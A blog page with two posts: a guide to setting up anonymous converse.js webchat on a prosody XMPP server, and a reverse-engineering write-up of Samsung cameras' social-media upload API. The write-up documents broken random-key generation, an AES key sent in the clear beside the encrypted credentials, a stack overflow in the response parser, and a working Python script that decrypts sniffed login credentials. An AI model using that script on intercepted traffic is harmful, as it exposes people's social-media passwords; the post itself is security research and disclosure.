The goal of this post is to make an easily accessible (anonymous) webchat for any chatrooms hosted on a prosody XMPP server, using the web client converse.js.

Motivation and prerequisites

There are two use cases:

  1. Have an easily accessible default support room for users having trouble with the server or their accounts.

  2. Have a working "Join using browser" button on search.jabber.network

This setup will require:

  • A running prosody 0.12+ instance with a muc component (chat.yax.im in our example)

  • The willingness to operate an anomyous login and to handle abuse coming from it (anon.yax.im)

  • A web-server to host the static HTML and JavaScript for the webchat (https://yaxim.org/)

There are other places that describe how to set up a prosody server and a web server, so our focus is on configuring anonymous access and the webchat.

Prosody: BOSH / websockets

The web client needs to access the prosody instance over HTTPS. This can be accomplished either by using Bidirectional-streams Over Synchronous HTTP (BOSH) or the more modern WebSocket. We enable both mechanisms in prosody.cfg by adding the following two lines to the gloabl modules_enabled list, they can also be used by regular clients:

modules_enabled = {
    ...
    -- add HTTP modules:
    "bosh"; -- Enable BOSH access, aka "Jabber over HTTP"
    "websocket"; -- Modern XMPP over HTTP stream support
    ...
}

You can check if the BOSH endpoint works by visiting the /http-bind/ endpoint on your prosody's HTTPS port (5281 by default). The yax.im server is using mod_net_multiplex to allow both XMPP with Direct TLS and HTTPS on port 443, so the resulting URL is https://xmpp.yaxim.org/http-bind/.

Prosody: allowing anonymous logins

We need to add a new anonymous virtual host to the server configuration. By default, anonymous domains are only allowed to connect to services running on the same prosody instance, so they can join rooms on your server, but not connect out to other servers.

Add the new virtualhost at the end of prosody.cfg.lua:

-- add at the end, after the other VirtualHost sections, add:
VirtualHost "anon.yax.im"
    authentication = "anonymous"

    -- to allow file uploads for anonymous users, uncomment the following
    -- two lines (THIS IS NOT RECOMMENDED!)
    -- modules_enabled = { "discoitems"; }
    -- disco_items = { {"upload.yax.im"}; }

This is a new domain that needs to be made accessible to clients, so you also need to create an SRV record and ensure that your TLS certificate covers the new hostname as well, e.g. by updating the parameter list to certbot.

_xmpp-client._tcp.anon.yax.im.  3600 IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpps-client._tcp.anon.yax.im. 3600 IN SRV 5 1  443 xmpp.yaxim.org.

Converse.js webchat

Converse.js is a full XMPP client written in JavaScript. The default mode is to embed Converse into a website where you have a small overlay window with the chat, that you can use while navigating the site.

However, we want to have a full-screen chat under the /chat/ URL and use that to join only one room at a time (either the support room or a room address that was explicitly passed) instead. For this, Converse has the fullscreen and singleton modes that we need to enable.

Furthermore, Converse does not (properly) support parsing room addresses from the URL, so we are using custom JavaScript to identify whether an address was passed as an anchor, and fall back to the support room yaxim@chat.yax.im otherwise.

The following is based on release 10.1.6 of Converse.

  1. Download the converse tarball (not converse-headless) and copy the dist folder into your document root.

  2. Create a folder chat/ or webchat/ in the document root, where the static HTML will be placed

  3. Create an index.html with the following content (minimal example):

<html lang="en">
<head>
    <title>yax.im webchat</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="browser-based access to the xmpp/jabber chatrooms on chat.yax.im" />
    <link type="text/css" rel="stylesheet" media="screen" href="/dist/converse.min.css" />
    <script src="/dist/converse.min.js"></script>
</head>

<body style="width: 100vw; height: 100vh; margin:0">
<div id="conversejs">
</div>
<noscript><h1>This chat only works with JavaScript enabled!</h1></noscript>
<script>
let room = window.location.search || window.location.hash;
room = decodeURIComponent(room.substring(room.indexOf('#') + 1, room.length));
if (!room) {
        room = "yaxim@chat.yax.im";
}
converse.initialize({
   "allow_muc_invitations" : false,
   "authentication" : "anonymous",
   "auto_join_on_invite" : true,
   "auto_join_rooms" : [
      room
   ],
   "auto_login" : true,
   "auto_reconnect" : false,
   "blacklisted_plugins" : [
      "converse-register"
   ],
   "jid" : "anon.yax.im",
   "keepalive" : true,
   "message_carbons" : true,
   "use_emojione" : true,
   "view_mode" : "fullscreen",
   "singleton": true,
   "websocket_url" : "wss://xmpp.yaxim.org:5281/xmpp-websocket"
});
</script>
</div>
</body>
</html>
Posted 2024-01-10 11:01 Tags:

Back in 2009, Samsung introduced cameras with Wi-Fi that could upload images and videos to your social media account. The cameras talked to an (unencrypted) HTTP endpoint at Samsung's Social Network Services (SNS), probably to quickly adapt to changing upstream APIs without having to deploy new camera firmware.

This post is about reverse engineering the API based on a few old PCAPs and the binary code running on the NX300. We are finding a fractal of spectacular encryption fails created by Samsung, and creating a PoC reference server implementation in python/flask.

Before Samsung discontinued the SNS service in 2021, their faulty implementation allowed a passive attacker to decrypt the users social media credentials (there is no need to decrypt the media, as they are uploaded in the clear). And there were quite some buffer overflows along the way.

Skip right to the encryption fails!

Show me the code!

History

The social media upload feature was introduced with the ST1000 / CL65 model, and soon added to the compact WB150F/WB850F/ST200F and the NX series ILCs with the NX20/NX210/NX1000 introduction.

Ironically, Wi-Fi support was implemented inconsistently over the different models and generations. There is a feature matrix for the NX models with a bit of an overview of the different Wi-Fi modes, and this post only focuses on the (also inconsistently implemented) cloud-based email and social network features.

Some models like the NX mini support sending emails as well as uploading (photos only) to four different social media platforms, other models like the NX30 came with 2GB of free Dropbox storage, while the high-end NX1 and NX500 only supported sending emails through SNS, but no social media. The binary code from the NX300 reveals 16 different platforms, whereas its UI only offers 5, and it allows uploading of photos as well as videos (but only to Facebook and YouTube). In 2015, Samsung left the camera market, and in 2021 they shut down the API servers. However, these cameras are still used in the wild, and some people complained about the termination.

Given that there is no HTTPS, a private or community-driven service could be implemented by using a custom DNS server and redirecting the camera's traffic.

Back then, I took that as a chance to reverse engineer the more straight-forward SNS email API and postponed the more complex looking social media API until now.

Email API

The easy part about the email API was that the camera sent a single HTTP POST request with an XML form containing the sender, recipient and body text, and the pictures attached. To succeed, the API server merely had to return 200 OK. Also the camera I was using (the NX500) didn't have support for any of the other services.

POST /social/columbus/email?DUID=123456789033  HTTP/1.0
Authorization:OAuth oauth_consumer_key="censored",oauth_nonce="censored",oauth_signature="censored=",oauth_signature_method="HmacSHA1",oauth_timestamp="9717886885",oauth_version="1.0"
x-osp-version:v1
User-Agent: sdeClient
Content-Type: multipart/form-data; boundary=---------------------------7d93b9550d4a
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Pragma: no-cache
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)
Host: www.ospserver.net
Content-Length: 1321295

-----------------------------7d93b9550d4a
content-disposition: form-data; name="message"; fileName="sample.txt"
content-Type: multipart/form-data;

<?xml version="1.0" encoding="UTF-8"?>
<email><sender>Camera@samsungcamera.com</sender><receiverList><receiver>censored@censored.com</receiver></receiverList><title><![CDATA[[Samsung Smart Camera] sent you files.]]></title><body><![CDATA[Sent from Samsung Camera.
language_sh100_utf8]]></body></email>

-----------------------------7d93b9550d4a
content-disposition: form-data; name="binary"; fileName="SAM_4371.JPG"
content-Type: image/jpeg;

<snip>

-----------------------------7d93b9550d4a

The syntax is almost valid, except there is no epilogue (----foo--) after the image, but just a boundary (----foo), so unpatched HTTP servers will not consider this as a valid request.

Social media login

The challenge with the social media posting was that the camera is sending multiple XML requests, and parsing the answer from XML documents in an unknown format, which cannot be obtained from the wire after Samsung terminated the official servers. Another challenge was that the credentials are transmitted in an encrypted way, so the encryption needed to be analyzed (and possibly broken) as well. Here is the first request from the camera when logging into Facebook:

POST http://snsgw.samsungmobile.com/facebook/auth HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<Request Method="login" Timeout="3000" CameraCryptKey="58a4c8161c8aa7b1287bc4934a2d89fa952da1cddc5b8f3d84d3406713a7be05f67862903b8f28f54272657432036b78e695afbe604a6ed69349ced7cf46c3e4ce587e1d56d301c544bdc2d476ac5451ceb217c2d71a2a35ce9ac1b9819e7f09475bbd493ac7700dd2e8a9a7f1ba8c601b247a70095a0b4cc3baa396eaa96648">
<UserName Value="uFK%2Fz%2BkEchpulalnJr1rBw%3D%3D"/>
<Password Value="ob7Ue7q%2BkUSZFffy3%2BVfiQ%3D%3D"/>
<PersistKey Use="true"/>
4p4uaaq422af3"/>
<SessionKey Type="APIF"/>
<CryptSessionKey Use="true" Type="SHA1" Value="//////S3mbZSAQAA/LOitv////9IIgS2UgEAAAAQBLY="/>
<ApplicationKey Value="6a563c3967f147d3adfa454ef913535d0d109ba4b4584914"/>
</Request>

For the other social media platforms, the /facebook/ part of the URL is replaced with the respective service name, except that some apparently use OAuth instead of sending encrypted credentials directly.

Locating the code to reverse-engineer

Of the different models supporting the feature, the Tizen-based NX300 seemed to be the best candidate, given that it's running Linux under the hood. Even though Samsung never provided source code for the camera UI and its components, reverse-engineering an ELF binary running on a Linux host where you are root is a totally different game than trying to pierce a proprietary ARM SoC running an unknown OS from the outside.

When requesting an image upload, the camera starts a dedicated program, smart-wifi-app-nx300. Luckily, the NX300 FOSS dump contains three copies of it, two of which are not stripped:

~/TIZEN/project/NX300/$ find . -type f -name smart-wifi-app-nx300 -exec ls -alh {} \;
-rwxr-xr-x 1  5.2M Oct 16  2013 ./imagedev/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1  519K Oct 16  2013 ./image/rootdir/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1  5.2M Oct 16  2013 ./image/rootdir_3-5/usr/bin/smart-wifi-app-nx300

Unfortunately, the actual logic is happening in libwifi-sns.so, of which all copies are stripped. There is a header file libwifi-sns/client_predefined.h provided (by accident) as part of the dev image, but it only contains the string values from which the requests are constructed:

#define WEB_XML_LOGIN_REQUEST_PREFIX "<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\""
#define WEB_XML_USER_PREFIX          "<UserName Value=\""
#define WEB_XML_PW_PREFIX            "<Password Value=\""
...

The program is also doing extensive debugging through /dev/log_main, including the error messages that we cause when re-creating the API.

We will load both smart-wifi-app-nx300 and libwifi-sns.so in Ghidra and use its pretty good decompiler to get an understanding of the code. The following code snippets are based on the decompiler output, edited for better understanding and brevity (error checks and debug outputs are stripped).

Processing the login credentials

When trying the upload for the first time, the camera will pop up a credentials dialog to get the username and password for the specific service:

Screenshot of the NX login dialog

Internally, the plain-text credentials and social network name are stored for later processing in a global struct gWeb, the layout of which is not known. The field names and sizes of gWeb fields in the following code blocks are based on correlating debug prints and memset() size arguments, and need to be taken with a grain of salt.

The actual auth request is prepared by the WebLogin function, which will resolve the numeric site ID into the site name (e.g. "facebook" or "kakaostory"), get the appropriate server name ("snsgw.samsungmobile.com" or a regional endpoint like na-snsgw.samsungmobile.com for North America), and call into WebMakeLoginData() to encrypt the login credentials and eventually to create a HTTP POST payload:

bool WebMakeLoginData(char *out_http_request,int site_idx) {
    /* snip quite a bunch of boring code */
    switch (WebCheckSNSGatewayLocation(site_idx)) {
    case /*0*/ LOCATION_EUROPE:
        host = "snsgw.samsungmobile.com"; break;
    case /*1*/ LOCATION_USA:
        host = "na-snsgw.samsungmobile.com"; break;
    case /*2*/ LOCATION_CHINA:
        host = "cn-snsgw.samsungmobile.com"; break;
    case /*3*/ LOCATION_SINGAPORE:
        host = "as-snsgw.samsungmobile.com"; break;
    case 4 /* unsure, maybe staging? */:
        host = "sta.snsgw.samsungmobile.com"; break;
    default: /* Asia? */
        host = "as-snsgw.samsungmobile.com"; break;
    }
    Web_Encrypt_Init();
    Web_Get_Duid(); /* calculate device unique identifier into gWeb.duid */
    Web_Get_Encrypted_Id(); /* encrypt user id into gWeb.enc_id */
    Web_Get_Encrypted_Pw(); /* encrypt password into gWeb.enc_pw */
    Web_Get_Camera_CryptKey(); /* encrypt keyspec into gWeb.encrypted_session_key */
    URLEncode(&encrypted_session_key,gWeb.encrypted_session_key);
    if (site_idx == /*5*/ SITE_SAMSUNGIMAGING || site_idx == /*6*/ SITE_CYWORLD) {
        WebMakeDataWithOAuth(out_http_request);
    } else if (site_idx == /*14*/ SITE_KAKAOSTORY) {
        /* snip HTTP POST with unencrypted credentials to sandbox-auth.kakao.com */
    } else {
        /* snip and postpone HTTP POST with XML payload to snsgw.samsungmobile.com */
    }
}

From there, Web_Encrypt_Init() is called to reset the gWeb fields, to obtain a new (symmetric) encryption key, and to encrypt the application_key:

bool Web_Encrypt_Init(void) {
    char buffer[128];
    memset(gWeb.keyspec,0,64);
    memset(gWeb.encrypted_application_key,0,128);
    memset(gWeb.enc_id,0,64);
    memset(gWeb.enc_pw,0,64);
    memset(gWeb.encrypted_session_key,0,512);
    memset(gWeb.duid,0,64);

    generateKeySpec(&gWeb.keyspec);
    dataEncrypt(&buffer,gWeb.application_key,gWeb.keyspec);
    URLEncode(&gWeb.encrypted_application_key,buffer);
}

We remember the very interesting generateKeySpec() and dataEncrypt() functions for later analysis.

WebMakeLoginData() also calls Web_Get_Encrypted_Id() and Web_Get_Encrypted_Pw() to obtain the encrypted (and base64-encoded) username and password. Those follow the same logic of dataEncrypt() plus URLEncode() to store the encrypted values in respective fields in gWeb as well.

bool Web_Get_Encrypted_Pw() {
    char buffer[128];
    memset(gWeb.enc_pw,0,64);
    dataEncrypt(&buffer,gWeb.password,gWeb.keyspec);
    URLEncode(&gWeb.enc_pw,buffer);
}

Interestingly, we are using a 128-byte intermediate buffer for the encryption result, and URL-encoding it into a 64-byte destination field. However, gWeb.password is only 32 bytes, so we are hopefully safe here. Nevertheless, there are no range checks in the code.

Finally, it calls Web_Get_Camera_CryptKey() to RSA-encrypt the generated keyspec and to store it in gWeb.encrypted_session_key. The actual encryption is done by encryptSessionKey(&gWeb.encrypted_session_key,gWeb.keyspec) which we should also look into.

Generating the secret key: generateKeySpec()

That function is as straight-forward as can be, it requests two blocks of random data into a 32-byte array and returns the base-64 encoded result:

int generateKeySpec(char **out_keyspec) {
    char rnd_buffer[32];
    int result;
    char *rnd1 = _secureRandom(&result);
    char *rnd2 = _secureRandom(&result);
    memcpy(rnd_buffer, rnd1, 16);
    memcpy(rnd_buffer+16, rnd2, 16);
    char *b64_buf = String_base64Encode(rnd_buffer,32,&result);
    *out_keyspec = b64_buf;
}

(In)secure random number generation: _secureRandom()

It's still worth looking into the source of randomness that we are using, which hopefully should be /dev/random or at least /dev/urandom, even on an ancient Linux system:

char *_secureRandom(int *result)
{
    srand(time(0));
    char *target = String_new(20,result);
    String_format(target,20,"%d",rand());
    target = _sha1_byte(target,result);
    return target;
}

WAIT WHAT?! Say that again, slowly! You are initializing the libc pseudo-random number generator with the current time, with one-second granularity, then getting a "random" number from it somewhere between 0 and RAND_MAX = 2147483647, then printing it into a string and calculating a 20-byte SHA1 sum of it?!?!?!

Apparently, the Samsung engineers never heard of the Debian OpenSSL random number generator, or they considered imitating it a good idea?

The entropy of this function depends only on how badly the user maintains the camera's clock, and can be expected to be about six bits (you can only set minutes, not seconds, in the camera), instead of the 128 bits required.

Calling this function twice in a row will almost always produce the same insecure block of data.

The function name _sha1_byte() is confusing as well, why is it a singular byte, and why is there no length parameter?

char *_sha1_byte(char *buffer, int *result) {
    int len = strlen(buffer);
    char *shabuf = malloc(20);
    int hash_len = 20;
    memset(shabuf,0,hash_len);
    SecCrHash(shabuf,&hash_len);
    return shabuf;

That looks plausible, right? We just assume that buffer is a NUL-terminated string (the string we pass from _secureRandom() is one), and then we... don't pass it into the SecCrHash() function? We only pass the virgin 20-byte target array to write the hash into? The hash of what?

int SecCrHash(void *dst, int *out_len) {
    char buf [20];
    *out_len = 20;
    memcpy(dst, buf, *out_len);
    return 0;
}

It turns out, the SecCrHash function (secure cryptographic hash?) is not hashing anything, and it's not processing any input, it's just copying 20 bytes of uninitialized data from the stack to the destination buffer. So instead of returning an obfuscated timestamp, we are returning some (even more deterministic) data that previous function calls worked with.

Well, from an attacker point of view, this actually makes cracking the key (slightly) harder, as we can't just fuzz around the current time, we need to actually get an understanding of the calls happening before that and see what kind of data they can leave on the stack.

SPOILER: No, we don't have to. Samsung helpfully leaked the symmetric encryption key for us. But let's still finish this arc and see what else we can find. Skip to the encryption key leak.

Encrypting values: dataEncrypt()

The secure key material in gWeb.keyspec is passed to dataEncrypt() to actually encrypt strings:

int dataEncrypt(char **out_enc_b64, char *message, char *key_b64) {
    int result;
    char *keyspec;
    String_base64Decode(key_b64,&keyspec,&result);
    char key[16];
    char iv[16];
    memcpy(key, keyspec, 16);
    memcpy(iv, keyspec+16, 16);
    return _aesEncrypt(message, key, iv, &result);
}

char *_aesEncrypt(char *message, char *key, char *iv, int *result) {
    int bufsize = (strlen(message) + 15) & ~15; /* round up to block size */
    char *enc_data = malloc(bufsize);
    SecCrEncryptBlock(&enc_data,&bufsize,message,bufsize,key,16,iv,16);
    char *ret_buf = String_base64Encode(enc_data,bufsize,result);
    free(enc_data);
    return ret_buf;
}

The _aesEncrypt() function is calling SecCrEncryptBlock() and base-64-encoding the result. From SecCrEncryptBlock() we have calls into NAT_CipherInit() and NAT_CipherUpdate() that are initializing a cipher context, copying key material, and passing all calls through function pointers in the cipher context, but it all boils down to doing standard AES-CBC, with the first half of keyspec used as the encryption key, and the second half as the IV, and the (initial) IV being the same for all dataEncrypt() calls.

The prefixes SecCr and NAT imply that some crypto library is in use, but there are no obvious results on google or github, and the function names are mostly self-explanatory.

Encrypting the secret key: encryptSessionKey()

This function will decode the base64-encoded 32-byte keyspec, and encrypt it with a hard-coded RSA key:

int encryptSessionKey(char **out_rsa_enc,char *keyspec)

{
  int result;
  char *keyspec_raw;
  int keyspec_raw_len = String_base64Decode(keyspec,&keyspec_raw,&result);
  char *dst = _rsaEncrypt(keyspec_raw,keyspec_raw_len,
        "0x8ae4efdc724da51da5a5a023357ea25799144b1e6efbe8506fed1ef12abe7d3c11995f15
        dd5bf20f46741fa7c269c7f4dc5774ce6be8fc09635fe12c9a5b4104a890062b9987a6b6d69
        c85cf60e619674a0b48130bb63f4cf7995da9f797e2236a293ebc66ee3143c221b2ddf239b4
        de39466f768a6da7b11eb7f4d16387b4d7",
        "0x10001",&result);
  *out_rsa_enc = dst;
}

The _rsaEncrypt() function is using the BigDigits multiple-precision arithmetic library to add PCKS#1 v1.5 padding to the keyspec, encrypt it with the supplied m and e values, and return the encrypted value. The result is a long hex number string like the one we can see in the <Request/> PCAP above.

Completing the HTTP POST: WebMakeLoginData() contd.

Now that we have all the cryptographic ingredients together, we can return to actually crafting the HTTP request.

There are three different code paths taken by WebMakeLoginData(). One into WebMakeDataWithOAuth() for the samsungimaging and cyworld sites, one creating a x-www-form-urlencoded HTTP POST to sandbox-auth.kakao.com, and one creating the XML <Request/> we've seen in the packet trace for all other social networks. Given the obscurity of the first three networks, we'll focus on the last code path:

WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
WebString_Add_fmt(body,"%s%s%s",
                "<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\"",
                encrypted_session_key,"\">\r\n");
if (site_idx != /*34*/ SITE_SKYDRIVE) {
    WebString_Add_fmt(body,"%s%s%s","<UserName Value=\"",gWeb.enc_id,"\"/>\r\n");
    WebString_Add_fmt(body,"%s%s%s","<Password Value=\"",gWeb.enc_pw,"\"/>\r\n");
}
WebString_Add_fmt(body,"%s%s%s","<PersistKey Use=\"true\"/>\r\n",duid,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s","<SessionKey Type=\"APIF\"/>","\r\n");
WebString_Add_fmt(body,"%s%s%s","<CryptSessionKey Use=\"true\" Type=\"SHA1\" Value=\"",
                gWeb.keyspec,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s","<ApplicationKey Value=\"",gWeb.application_key,
                "\"/>\r\n");
WebString_Add_fmt(body,"%s%s","</Request>","\r\n");
body_len = strlen(body);
WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/auth HTTP/1.1","\r\n");
WebString_Add_fmt(header,"%s%s%s","Host: ",host,"\r\n");
WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
WebAddString(out_http_request, header);
WebAddString(out_http_request, body);

Okay, so generating XML via a fancy sprintf() has been frowned upon for a long time. However, if done correctly, and if there is no attacker-controlled input with escape characters, this can be an acceptable approach.

In our case, the duid is surrounded by closing tags due to an obvious programmer error, but beyond that, all parameters are properly controlled by encoding them in hex, in base64, or in URL-encoded base64.

We are transmitting the RSA-encrypted session key (as CameraCryptKey), the AES-encrypted username and password (except when uploading to SkyDrive), the duid (outside of a valid XML element), the application_key that we encrypted earlier (but we are sending the unencrypted variable) and the keyspec in the CryptSessionKey element.

The keyspec? Isn't that the secret AES key? Well yes it is. All that RSA code turns out to be a red herring, we get the encryption key on a silver plate!

Decrypting the sniffed login credentials

Can it be that easy? Here's a minimal proof-of-concept in python:

#!/usr/bin/env python3

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from base64 import b64decode
from urllib.parse import unquote
import xml.etree.ElementTree as ET
import sys

def decrypt_string(key, s):
    d = Cipher(algorithms.AES(key[0:16]), modes.CBC(key[16:])).decryptor()
    plaintext = d.update(s)
    return plaintext.decode('utf-8').rstrip('\0')

def decrypt_credentials(xml):
    x_csk = xml.find("CryptSessionKey")
    x_user = xml.find("UserName")
    x_pw = xml.find("Password")

    key = b64decode(x_csk.attrib['Value'])
    enc_user = b64decode(unquote(x_user.attrib['Value']))
    enc_pw = b64decode(unquote(x_pw.attrib['Value']))

    return (key, decrypt_string(key, enc_user), decrypt_string(key, enc_pw))

def decrypt_file(fn):
    key, user, pw = decrypt_credentials(ET.parse(fn).getroot())
    print('User:', user, 'Password:', pw)

for fn in sys.argv[1:]:
    decrypt_file(fn)

If we pass the earlier <Request/> XML to this script, we get this:

User: x Password: z

Looks like somebody couldn't be bothered to touch-tap-type long values.

Now we also can see what kind of garbage stack data is used as the encryption keys.

On the NX300, the results confirm our analysis, this looks very much like stack garbage, with minor variations between _secureRandom() calls:

00000000: ffff ffff f407 a5b6 5201 0000 fc03 aeb6  ........R.......
00000010: ffff ffff 4872 0fb6 5201 0000 0060 0fb6  ....Hr..R....`..

00000000: ffff ffff f487 9ab6 5201 0000 fc83 a3b6  ........R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6  ....H...R.......

00000000: ffff ffff 48a2 04b6 5201 0000 0090 04b6  ....H...R.......
00000010: ffff ffff 48a2 04b6 5201 0000 0090 04b6  ....H...R.......

00000000: ffff ffff f4a7 9ab6 5201 0000 fca3 a3b6  ........R.......
00000010: ffff ffff 4812 05b6 5201 0000 0000 05b6  ....H...R.......

00000000: ffff ffff f4b7 99b6 5201 0000 fcb3 a2b6  ........R.......
00000010: ffff ffff 4822 04b6 5201 0000 0010 04b6  ....H"..R.......

00000000: ffff ffff 48f2 04b6 5201 0000 00e0 04b6  ....H...R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6  ....H...R.......

On the NX mini, the data looks much more random, but consistently key==iv - suggesting that it is actually a sort of sha1(rand()):

00000000: 00e0 fdcd e5ae ea50 a359 8204 03da f992  .......P.Y......
00000010: 00e0 fdcd e5ae ea50 a359 8204 03da f992  .......P.Y......

00000000: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7  .$...\...ou.>...
00000010: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7  .$...\...ou.>...

00000000: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412  ....\...,..6....
00000010: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412  ....\...,..6....

00000000: d1df 767e eb51 bd40 96d0 3c89 1524 a61c  ..v~.Q.@..<..$..
00000010: d1df 767e eb51 bd40 96d0 3c89 1524 a61c  ..v~.Q.@..<..$..

00000000: d757 4c46 d96d 262f a986 3587 7d29 7429  .WLF.m&/..5.})t)
00000010: d757 4c46 d96d 262f a986 3587 7d29 7429  .WLF.m&/..5.})t)

00000000: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a  .V.A.........V.z
00000010: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a  .V.A.........V.z

Social media login response

The HTTP POST request is passed to WebOperateLogin() which will create a TCP socket to port 80 of the target host, send the request and receive the response into a 2KB buffer:

bool WebOperateLogin(int sock_idx,char *buf,ulong site_idx) {
    int buflen = strlen(buf);
    SendTCPSocket(sock_idx,buf,buflen,0,false,0,0);
    rx_buf = malloc(2048);
    int rx_size = ReceiveTCPProcess(sock_idx,rx_buf,300);
    bool login_result = WebCheckLogin(rx_buf,site_idx);
}

The TCP process (actually just a pthread) will clear the buffer and read up to 2047 bytes, ensuring a NUL-terminated result. The response is then "parsed" to extract success / failure flags.

Parsing the login response: WebCheckLogin()

The HTTP response (header plus body) is then searched for certain "XML" "fields" to parse out relevant data:

bool WebCheckLogin(char *buf,int site_idx) {
    char value[512];
    memset(value,0,512);
    if (GetXmlString(buf,"ErrCode",value)) {
        strcpy(gWeb.ErrCode,value); /* gWeb.ErrCode is 16 bytes */
        if (!GetXmlString(buf, "ErrSubCode",value))
            return false;
        strcpy(gWeb.SubErrCode,value); /* gWeb.SubErrCode is also 16 bytes */
        return false;
    }
    if (!GetXmlString(buf,"Response SessionKey",value))
        return false;
    strcpy(gWeb.response_session_key,value); /* ... 64 bytes */
    memset(value,0,512);
    if (!GetXmlString(buf,"PersistKey Value",value))
        return false;
    strcpy(gWeb.persist_key,value); /* ... 64 bytes */
    memset(value,0,512);
    if (!GetXmlString(buf,"CryptSessionKey Value",value))
        return false;
    memset(gWeb.keyspec,0,64);
    strcpy(gWeb.keyspec,value); /* ... 64 bytes */
    if (site_idx == /*34*/ SITE_SKYDRIVE) {
        strcpy(gWeb.LoginPeopleID, "owner");
    } else {
        memset(value,0,512);
        if (!GetXmlString(buf,"LoginPeopleID",value)) {
            return false;
        }
    }
    strcpy(gWeb.LoginPeopleID,value); /* ... 128 bytes */
    if (site_idx == /*34*/ SITE_SKYDRIVE) {
        memset(value,0,512);
        if (!GetXmlString(buf,"OAuth URL",value))
            return false;
        ReplaceString(value,"&amp;","&",skydriveURL);
    }
    return true;
}

The GetXmlString() function is actually quite a euphemism. It does not actually parse XML. Instead, it's searching for the first verbatim occurence of the passed field name, including the verbatim whitespace, checking that it's followed by a colon or an equal sign, and then copying everything from the quotes behind that into out_value. It does not check the buffer bounds, and doesn't ensure NUL-termination, so the caller has to clear the buffer each time (which it doesn't do consistently):

bool GetXmlString(char *xml,char *field,char *out_value) {
    char *position = strstr(xml, field);
    if (!position)
        return false;
    int field_len = strlen(field);
    char *field_end = position + field_len;
    /* snip some decompile that _probably_ checks for a '="' or ':"' postfix at field_end */
    char *value_begin = position + fieldlen + 2;
    char *value_end = strstr(value_begin,"\"");
    if (!value_end)
        return false;
    memcpy(out_value, value_begin, value_end - value_begin);
    return true;

Given that the XML buffer is 2047 bytes controlled by the attacker server operator, and value is a 512-byte buffer on the stack, this calls for some happy smashing!

The ErrCode and ErrSubCode are passed to the UI application, and probably processed according to some look-up tables / error code tables, which are subject to reverse engineering by somebody else. Valid error codes seem to be: 4019 ("invalid grant" from kakaostory), 8001, 9001, 9104.

Logging out

The auth endpoint is also used for logging out from the camera (this feature is well-hidden, you need to switch the camera to "Wi-Fi" mode, enter the respective social network, and then press the 🗑 trash-bin key):

<Request Method="logout" SessionKey="pmlyFu8MJfAVs8ijyMli" CryptKey="ca02890e42c48943acdba4e782f8ac1f20caa249">
</Request>

Writing a minimal auth handler

For the positive case, a few elements need to be present in the response XML. A valid example for that is response-login.xml:

<Response SessionKey="{{ sessionkey }}">
<PersistKey Value="{{ persistkey }}"/>
<CryptSessionKey Value="{{ cryptsessionkey }}"/>
<LoginPeopleID="{{ screenname }}"/>
<OAuth URL="http://snsgw.samsungmobile.com/oauth"/>
</Response>

The camera will persist the SessionKey value and pass it to later requests. Also it will remember the user as "logged in" and skip the /auth/ endpoint in the future. It is unclear yet how to reset that state from the API side to allow a new login (maybe it needs the right ErrCode value?)

A negative response would go along these lines:

<Response ErrCode="{{ errcode }}" ErrSubCode="{{ errsubcode }}" />

And here is the respective Flask handler PoC:

@app.route('/<string:site>/auth',methods = ['POST'])
def auth(site):
    xml = ET.fromstring(request.get_data())
    method = xml.attrib["Method"]
    if method == 'logout':
        return "Logged out for real!"
    keyspec, user, password = decrypt_credentials(xml)
    # TODO: check credentials
    return render_template('response-login.xml',
        sessionkey=mangle_address(user),
        screenname="Samsung NX Lover")

Uploading pictures

After a successful login, the camera will actually start uploading files with WebUploadImage(). For each file, either the /facebook/photo or the /facebook/video endpoint is called with another XML request, followed by a HTTP PUT of the actual content.

bool WebUploadImage(int ui_ctx,int site_idx,int picType) {
    if (site_idx == /*14*/ SITE_KAKAOSTORY) {
        /* snip very long block handling kakaostory */
        return true;
    }
    /* iterate over all files selected for upload */
    for (int i = 0; i < gWeb.selected_count; i++) {
        gWeb.file_path = upload_file_names[i];
        gWeb.index = i+1;
        char *buf = malloc(2048);
        WebMakeUploadingMetaData(buf,site_idx);
        WebOperateMetaDataUpload(site_idx,0,buf);
        WebOperateUpload(0,picType);
    }
    return true;
}

Upload request: WebOperateMetaDataUpload()

The image matadata is prepared by WebMakeUploadingMetaData() and sent by WebOperateMetaDataUpload(). The (user-editable) facebook folder name is properly XML-escaped:

bool WebMakeUploadingMetaData(char *out_http_request,int site_idx) {
    /* snip hostname selection similar to WebMakeLoginData */
    if (strstr(gWeb.file_path, "JPG") != NULL) {
        WebParseFileName(gWeb.file_path,gWeb.file_name);
        /* "authenticate" the request by SHA1'ing some static secrets */
        char header_for_sig[256];
        sprintf(header_for_sig,"/%s/photo.upload*%s#%s:%s",gWeb.site,
            gWeb.persist_key,gWeb.response_session_key,gWeb.keyspec);
